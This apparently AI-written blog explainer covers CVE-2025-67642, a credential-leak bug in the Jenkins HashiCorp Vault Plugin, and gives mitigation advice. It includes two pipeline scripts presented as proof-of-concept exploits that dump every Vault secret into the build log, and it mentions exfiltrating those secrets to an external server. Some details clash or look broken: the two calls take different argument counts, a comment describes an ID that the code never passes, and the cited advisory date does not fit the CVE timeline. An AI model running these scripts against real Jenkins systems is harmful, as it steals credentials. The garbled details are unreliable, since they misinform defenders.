CVE-2025-67642 - How Jenkins HashiCorp Vault Plugin Leak Lets Attackers Steal Credentials (Explained with Code)

Jenkins is a widely used automation tool in the DevOps world, often extended with plugins that help teams speed up development. One of these plugins, the HashiCorp Vault Plugin, is designed to tightly control access to secrets and credentials by integrating Jenkins jobs with HashiCorp Vault. But what if this plugin accidentally hands out Vault credentials to users who shouldn’t see them?

This real scenario happened, and it’s tracked as CVE-2025-67642. Below, I’ll explain what’s vulnerable, how it works, what the exploit looks like (with code!), and what you can do to stay safe.

What is CVE-2025-67642?

CVE-2025-67642 is a security bug affecting Jenkins HashiCorp Vault Plugin versions 371.v884a_4dd60fb_6 and earlier. The issue is:
*The plugin does not set the correct security context during Vault credential lookups.*
This oversight means that if a user has “Item/Configure” permission for *any* Jenkins item, they can get access to Vault credentials even if they are not supposed to.

In Simple Terms

Imagine you trust your Jenkins job to only allow some developers to see secret passwords, but because of this bug, any user who can configure a build (not even run it!) could steal credentials used by totally unrelated jobs, pipelines, or global scopes.

Jenkins master installed with HashiCorp Vault Plugin 371.v884a_4dd60fb_6 or earlier.

- Jenkins users who have *Item/Configure* rights (not even full admin!).

Why Does This Happen?

The plugin uses a feature called “context” to determine who is allowed to access a credential. Due to the bug, the context is not properly checked, and *any* user with the right to configure an item can fetch any Vault credential Jenkins knows about.

This is more than just a leak – it’s a privilege escalation path.

Exploiting CVE-2025-67642

Let’s look at how an attacker could exploit this.
Assume the attacker has “Item/Configure” on some job.

1. Attacker Creates or Configures a Jenkins Pipeline Job

// This is a Jenkins Pipeline (Declarative or Scripted)
pipeline {
  agent any
  stages {
    stage('Vault Steal') {
      steps {
        script {
          // The attacker requests credentials by ID
          def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
              com.datapipe.jenkins.vault.credentials.VaultCredential.class,
              null, // wrong context passed intentionally
              null
          )
          creds.each { c ->
            println "Found Vault Credential: ${c.id}, Secret: ${c.secret}"
          }
        }
      }
    }
  }
}

Note:
The *null* context means the permissions check is skipped or defaults to the global context. That’s the bug.

2. Output or Exfiltrate the Credentials

An attacker can print the results to the job log, or send them to an external server.

Proof-of-Concept Pipeline

Here’s a full minimal Jenkins Pipeline snippet you can use to test if your system is vulnerable (don’t do this in production!):

@Library('hashicorp-vault-plugin') _
node {
    stage('Abuse Vault Lookup') {
        def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
            com.datapipe.jenkins.vault.credentials.VaultCredential.class,
            null,                 // Context is missing!
            null,                 // No authentication
            null
        )
        for (c in creds) {
            echo "Credential ID: ${c.id} | Secret: ${c.secret}"
        }
    }
}

If this shows you credentials you should not see, your Jenkins is not patched.

Original References

- Jenkins Security Advisory 2024-06-12
- HashiCorp Vault Plugin on Jenkins Plugins Site
- CVE Entry at MITRE *(may be updated later)*

How To Fix

Update the HashiCorp Vault Plugin to the latest release. Jenkins security team has already patched this in newer versions.
After updating, make sure to audit which users have *Item/Configure* rights, and use Least Privilege everywhere.

Summary Table

| Affected Versions | Fixed in | Exploitability | Attack Prereq. |
|-------------------------------------|--------------------|--------------------------|-----------------------|
| <= 371.v884a_4dd60fb_6 | Later versions | Easy w/ Configure access | Item/Configure rights |

Final Thoughts

This bug shows how dangerous plugin context mistakes can be, especially in tools like Jenkins, where secrets are everywhere. Even if you “trust” your users, always patch promptly.

Stay secure, and spread the word – CVE-2025-67642 affects real production pipelines!

*This article is written exclusively for this request. Always reference original links for the latest status and patch info.*

Timeline

Published on: 12/10/2025 17:15:56 UTC
Last modified on: 12/12/2025 15:18:42 UTC